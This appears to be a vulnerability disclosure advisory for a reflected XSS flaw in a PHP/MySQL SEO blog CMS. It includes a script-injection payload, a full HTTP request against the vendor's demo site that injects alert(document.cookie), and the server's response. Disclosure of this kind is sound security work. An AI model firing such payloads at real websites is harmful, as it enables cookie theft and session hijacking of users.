## Title: SEO-friendly-blog-CMS-system-in-PHP-with-MYSQL-database-1.0-2023 XSS-Reflected Vulnerability ## Author: nu11secur1ty ## Date: 05.17.2023 ## Vendor: https://technosmarter.com/ ## Software: https://github.com/technosmarter/SEO-friendly-blog-CMS-system-in-PHP-with-MYSQL-database ## Reference XSS: https://portswigger.net/web-security/cross-site-scripting ## Description: The value of the keywords request parameter is copied into the HTML document as text between TITLE tags. The payload wi46u</title><script>alert(1)</script>fssgc was submitted in the keywords parameter. This input was echoed unmodified in the application's response. Conclusion: The `search` parameter is vulnerable for XSS-Reflected with Js injection. The malicious user can craft a very malicious URL and after this he can sending it to a very large group of people. This is very dangerous vulnerability. STATUS: CRITICAL Vulnerability [+]Exploit-XSS-test: ```XSS POST /blog/search/%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/2 Host: demo.technosmarter.com Cookie: PHPSESSID=c116aa1138f1c4a490514e8bad58eef4 Content-Length: 73 Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: https://demo.technosmarter.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://demo.technosmarter.com/blog/search/%3Cscript%3Ealert(document.cookie)%3C/script%3E Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 keywords=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&subsearch= ``` [+]Response: ```HTTP HTTP/2 302 Found Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0 Pragma: no-cache Location: https://demo.technosmarter.com/blog/search/<script>alert(document.cookie)</script> Content-Type: text/html; charset=UTF-8 Content-Length: 18035 Vary: Accept-Encoding Date: Wed, 17 May 2023 10:42:45 GMT Server: LiteSpeed Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Xss-Protection: 1; mode=block X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46" ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/technosmarter/2023/SEO-friendly-blog-CMS-system-in-PHP-with-MYSQL-database-1.0-2023) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/05/seo-friendly-blog-cms-10-2023-xss.html) ## Time spend: 00:37:00